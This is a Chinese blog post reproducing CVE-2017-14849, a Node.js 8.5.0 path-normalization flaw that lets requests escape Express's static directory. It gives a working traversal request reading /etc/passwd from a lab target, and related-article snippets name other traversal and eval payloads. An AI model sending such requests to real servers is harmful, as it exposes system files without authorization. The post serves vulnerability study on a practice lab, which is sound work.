Node.js 目录穿越漏洞 CVE-2017-14849 漏洞复现

Node.js 目录穿越漏洞CVE-2017-14849:Express框架中的任意文件读取风险
最新推荐文章于 2025-07-17 00:41:48 发布
原创 最新推荐文章于 2025-07-17 00:41:48 发布 · 548 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全漏洞 #网络安全 #渗透测试

这篇博客介绍了Node.js中的一个安全漏洞,即CVE-2017-14849,该漏洞允许攻击者通过目录穿越技术读取任意文件。问题源于Node.js 8.5.0版本在目录规范化处理上的逻辑错误,使得路径如'../../../foo/../../../../etc/passwd'被错误地规范化为'/etc/passwd'。利用此漏洞,攻击者可能在使用Express等依赖normalize函数的Web框架时,绕过文件访问限制,读取敏感信息。虽然在8.6版本中已修复,但该漏洞的影响仍然值得关注。

Node.js 目录穿越漏洞(CVE-2017-14849)

by ADummy

0x00利用路线

​ 连接到数据库,直接命令执行

0x01漏洞介绍

​ 原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(如../../../foo/../../../../etc/passwd),即可使normalize返回/etc/passwd,但实际上正确结果应该是../../../../../../etc/passwd

express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于normalize函数。比如,express在判断path是否超出静态目录范围时,就用到了normalize函数,上述BUG导致normalize函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。

当然,normalize的BUG可以影响的绝非仅有express,更有待深入挖掘。不过因为这个BUG是node 8.5.0 中引入的,在 8.6 中就进行了修复,所以影响范围有限。

0x02漏洞复现

访问http://your-ip:3000/即可查看到一个web页面,其中引用到了文件/static/main.js,说明其存在静态文件服务器。

发送如下数据包,即可读取passwd:

GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

在这里插入图片描述
在这里插入图片描述

g-EreW03u4-1615173855909)]

浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
Node.js 目录穿越漏洞CVE-2017-14849
来日可期的博客
02-02 1407
原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(如../../../foo/../../../../etc/passwd),即可使normalize返回/etc/passwd,但实际上正确结果应该是../../../../../../etc/passwd。
漏洞复现Node.js 目录穿越漏洞CVE-2017-14849
过期的秋刀鱼
12-17 1967
express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于normalize函数。比如,express在判断path是否超出静态目录范围时,就用到了normalize函数,上述BUG导致normalize函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。不过因为这个BUG是node 8.5.0 中引入的,在 8.6 中就进行了修复,所以影响范围有限。原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如。
第二十二天:WEB攻防-JS项目&Node.JS框架安全&识别审计&验证绕过
m0_51322401的博客
01-16 407
JavaScript语言特性在于,其他语言比如php,java语言需要解析方才能清楚看到代码本身,JavaScript语言则可以通过在其网站本身代码检查便可查看,等同于白盒测试在Javascript中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞
Node.js Windows下路径遍历漏洞
最新发布
murphysec的博客
07-17 1028
Node.js Windows路径遍历高危漏洞CVE-2025-27210)存在于Windows系统下,攻击者可利用Windows保留设备名(如AUX、CON、PRN等)绕过path.join的路径遍历保护,通过构造特殊路径(如..\\..\\AUX\\..\\..\\target.txt)访问敏感文件。受影响版本包括Node.js 20.0-20.19.3、22.0-22.17.0、24.0-24.4.0。修复版本通过添加保留设备名黑名单处理,建议升级至20.19.4、22.17.1或24.4.1及以上
Node.js CVE-2017-14849漏洞复现过程
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
04-20 1322
Vulhub 是一个专门用于学习渗透测试网络安全的虚拟靶场平台,其中包含了大量的漏洞环境和实验场景,供安全从业者进行实践和学习。通过 Vulhub,用户可以模拟真实的漏洞环境,并通过实际操作来理解漏洞原理、利用方法以及相应的防御措施。要使用 Vulhub 靶场,你可以按照以下步骤进行操作:获取 Vulhub:你可以从 Vulhub 的官方网站(https://www.vulhub.org/)上获取 Vulhub 的镜像文件或者源代码,并根据需要进行部署。
Node.js 常见漏洞学习与总结
weixin_50464560的博客
10-01 4047
转载https://threezh1.com/2020/01/30/NodeJsVulns/ 危险函数所导致的命令执行eval()eval() 函数可计算某个字符串,并执行其中的的 JavaScript 代码。和PHP中eval函数一样,如果传递到函数中的参数可控并且没有经过严格的过滤时,就会导致漏洞的出现。 简单例子: main.js 1234567891011var express = require("express");var app = express();app.get('/eval',fu
漏洞复现Node.js路径规范化漏洞深度解析与防御实践(CVE-2017-14849
KP_0x01的博客
01-01 909
Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如),在中间位置增加foo/../(如),即可使normalize返回,但实际上正确结果应该是。express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于normalize函数。比如,express在判断path是否超出静态目录范围时,就用到了normalize函数,上述BUG导致normalize函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。当然,normalize。
Mojarra JSF ViewState 反序列化漏洞
黑白的博客
12-27 3056
声明 好好学习,天天向上 漏洞描述 JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。 影响范围 2.1.29-08前 2.0.11-04前 复现过程 这里使用2.1.28版本 使用vulhub /app/vulhub-master/mojarra/jsf-view
Node.js 目录穿越漏洞CVE-2017-14849)——漏洞复现
W小哥
12-15 2507
一、漏洞原理 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如…/…/…/…/…/…/etc/passwd),在中间位置增加foo/…/(如…/…/…/foo/…/…/…/…/etc/passwd),即可使normalize返回/etc/passwd,但实际上正确结果应该是…/…/…/…/…/…/etc/passwd。 express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于normalize函数。比如,express在判断path
CVE-2017-14849复现
m0_46580995的博客
07-18 423
CVE-2017-14849复现 cve描述 Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to “…” handling was incompatible with the pathname validation used by unspecified community modules. 意思是 node.js 8.5.0 到8.6.0 之间的版本会造成目录穿
[译]Node.js安全清单
weixin_34008805的博客
10-15 284
前言 安全性,总是一个不可忽视的问题。许多人都承认这点,但是却很少有人真的认真地对待它。所以我们列出了这个清单,让你在将你的应用部署到生产环境来给千万用户使用之前,做一个安全检查。 以下列出的安全项,大多都具有普适性,适用于除了Node.js外的各种语言和框架。但是,其中也包含一些用Node.js写的小工具。 配置管理 安全性相关的HTT...
node.js漏洞——
m0_73756016的博客
06-06 1505
简单的说 Node.js 就是运行在服务端的 JavaScript。Node.js 是一个基于 Chrome JavaScript 运行时建立的一个平台。Node.js 是一个事件驱动 I/O 服务端 JavaScript 环境,基于 Google 的 V8 引擎,V8 引擎执行 Javascript 的速度非常快,性能非常好。总结一下我觉得node.js就是提供一个JavaScript环境 使这个语言升级 可以写一些后端的东西直接做题学习。
Node Security
weixin_30549657的博客
11-11 180
发一个很早之前做的一个小东西-安全管理软件-可以对U盘进行管理,对后台程序进行扫描、分析! 转载于:https://www.cnblogs.com/itrena/p/5938421.html...
Node.js目录穿越漏洞CVE-2017-14849
m0_65247093的博客
05-26 1446
影响版本(wappalyzer) Node.js 8.5.0 + Express 3.19.0-3.21.2 Node.js 8.5.0 + Express 4.11.0-4.15.5 Express框架: Express是基于Node.js平台,快速、开放、极简的web开发框架 漏洞本质: 原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值